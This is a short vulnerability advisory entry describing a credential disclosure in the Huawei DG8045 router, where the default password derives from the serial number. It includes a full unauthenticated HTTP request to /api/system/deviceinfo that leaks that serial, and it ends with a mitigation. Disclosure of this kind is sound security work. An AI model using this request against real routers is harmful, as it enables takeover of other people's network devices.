vendor:
DG8045 Router
by:
Abdalrahman Gamal
4.3
CVSS
MEDIUM
Credential Disclosure
CWE
Product Name: DG8045 Router
Affected Version From: dg8045
Affected Version To: dg8045
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2020
Huawei DG8045 Router 1.0 – Credential Disclosure
The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close
Mitigation:
Change the default password of the router